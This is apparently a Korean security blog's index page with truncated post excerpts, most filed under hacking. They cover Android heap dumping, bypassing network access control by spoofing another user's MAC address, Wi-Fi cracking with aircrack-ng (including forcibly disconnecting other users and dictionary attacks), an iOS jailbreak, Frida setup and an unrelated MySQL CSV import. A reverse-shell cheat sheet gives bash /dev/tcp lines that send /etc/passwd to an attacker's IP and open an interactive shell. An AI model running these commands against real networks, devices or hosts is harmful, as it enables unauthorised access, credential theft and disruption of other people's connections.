All
-
android ddms memory dumpHack/No filtered 2021. 1. 12. 09:58
1. 루팅 2. PC로 디버깅 시 Heap 접근 권한 부여 $ adb shell setprop libc.debug.malloc 1 $ adb shell stop $ adb shell start 3. android studio의 ddms(android device monitor)을 사용해서 Heap 영역 접근 (Native Heap 이 활성화 되지 않은 경우 C:/Users/JW/.android/ddms.cfg 파일에 native=true 추가) 4. ddms에서 덤프뜨려는 앱 선택 후 DUMP HPROF File 클릭하여 다운로드 5. HPROF File을 표준 형식으로 변환 /android/sdk/platform-tools 경로에 가서 hprof-conv [HPROF 파일명] [표준형식으로 바꿀 파일명..
-
[NAC] Network Access Control 우회 (MAC 탈취 / MAC 고정 )Hack/No filtered 2021. 1. 12. 09:52
[Windows 환경] 1) 정상 사용자의 MAC 탈취 시나리오 1. 와이어샤크를 이용하여 패킷 수집 후 정상 사용자의 MAC 획득 2. TMAC 프로그램을 이용하여 정상 사용자의 MAC으로 변조 3. 네트워크 정상 사용 2) 게이트웨이 IP에 대한 ARP 테이블 정적 등록을 이용한 우회 시나리오 0. 와이어샤크를 이용하여 패킷 수집 후 게이트웨이의 IP 및 MAC 주소 획득 1. 관리자권한으로 cmd 실행 2. arp 테이블 지우기 netsh interface ip delete neighbors 3. 적용할 네트워크 인터페이스 확인 netsh interface show interface 4. arp 테이블 정적 추가 netsh interface ip add neighbors "인터페이스 이름" "게이트..
-
Kali linux를 이용한 AP 해킹 (+windows)Hack/No filtered 2021. 1. 12. 09:42
iwconfig ifconfig wlan0 down [모니터 모드 전환] airmon-ng check kill : 모드 전환 시 간섭 발생 가능성이 있는 프로세스 종료 airmon-ng start wlan0 iwconfig [주변 무선랜 스캔] airodump-ng wlan0mon [타겟 설정] airodump-ng wlan0mon --channel 3 --bssid [bssid] -w [filename] [강제로 다른 사용자 연결 해제] aireplay-ng 0 [인증 해제 횟수] -a [AP의 MAC주소] -c [접속한 장비의 MAC주소] [사전 대입, wpa wpa2] aircrack-ng wpacrack-01.cap -w /usr/share/wordlists/sqlmap.txt [hashcat 사..
-
ios 9.3.3 탈옥Hack/jailbreak 2021. 1. 12. 09:36
pangu를 이용하여 탈옥(jailbreak) 시작! (http://pangu8.com/933.html) 상단에 있는 온라인용 탈옥방법은 Semi 탈옥이므로 주의, 그리고 9.3.2까지만 지원되므로 현혹당하지 않도록 주의바람. [세미탈옥 부분] '세미탈옥 부분'을 Skip하고 'Step by Step guide'를 참고하여 탈옥 시작 (아래 설명은 사이트위주로 참고바람) 1) PC에 파일을 다운로드하고 설치하면 작업표시줄과 바탕화면에 아이콘이 보임 2) 실행하면 디바이스관리자가 (iTunes 중국어버전 같은것) 실행됨 3) iphone을 usb포트를 이용하여 PC와 연결 4) Apple ID와 PW를 적어넣고 진행 (몇초 혹은 몇분 뒤 바탕화면에 PP한문4개) 아이콘 생성 5) 아이폰으로 가서 설정-프로..
-
Frida 환경 구축 with AnacondaHack/Frida 2020. 12. 30. 08:25
1. 아나콘다 파이썬 환경 구축 (www.anaconda.com/products/individual) - 파이썬 설치 (3.7.3) < 아나콘다 설치 시 자동으로 되는듯 - 아나콘다 설치 (4.6.11) - 독립된 파이썬 환경 구축 $ conda create -n py3.7.3 python=3.7.3 -y - 독립된 파이썬 환경 지정 $ activate py3.73 2. 녹스 앱플레이어 설치 - 기본 root 설정 - 모바일설정 : 스마트폰, 그래픽 모드 : 스피드 - adb 환경변수 설정 (C:\Program Files\Nox\bin) 3. 프리다 설치 $ pip install Frida-tools frida 12.4.7 4. 프리다 서버 실행 - 안드로이드 운영체제 스펙 확인 $ adb shell $..
-
mysql csv file importdevelopment/mysql 2020. 4. 9. 08:10
mysql table csv file import 시 table 구조와 csv file 구조가 동일할 때 아래와 같이 적용한다. /* table 구조 */ CREATE TABLE region ( id INT NOT NULL AUTO_INCREMENT, region_name VARCHAR(255) NOT NULL, ); /* csv file 구조 */ /* csv file format */ id,region_name 1,"Seoul" 2,"NewYork" 3,"jeju" 아래 명령어를 이용하여 적용 LOAD DATA INFILE '/tmp/data.csv' INTO TABLE region FIELDS TERMINATED BY ',' ENCLOSED BY '"' LINES TERMINATED BY '\n' ..
-
reverse shell summaryHack/No filtered 2020. 4. 8. 10:19
1. bash의 /dev/tcp 사용하기 쉘의 기본커맨드창에서 /dev/tcp를 이용하면 리버스쉘을 사용할 수 있다. 예로, cat /etc/passwd > /dev/tcp/공격자의 IP/PORT 이렇게하면 공격자의 IP/PORT로 /etc/passwd의 내용을 전달해준다. 응용하면 공격자에게 쉘까지 열어줄 수 있다. Cheat Sheet : /bin/sh >& /dev/tcp/Attacker_IP/PORT 0>&1 Cheat Sheet : bash -i >& /dev/tcp/Attacker_IP/PORT 0>&1 1: bash -i 2: >& /dev/tcp/Attacker_IP/PORT 3: 0>&1 bash -i는 bash shell을 대화형(interactive)모드로 사용하는 옵션이다. >& /..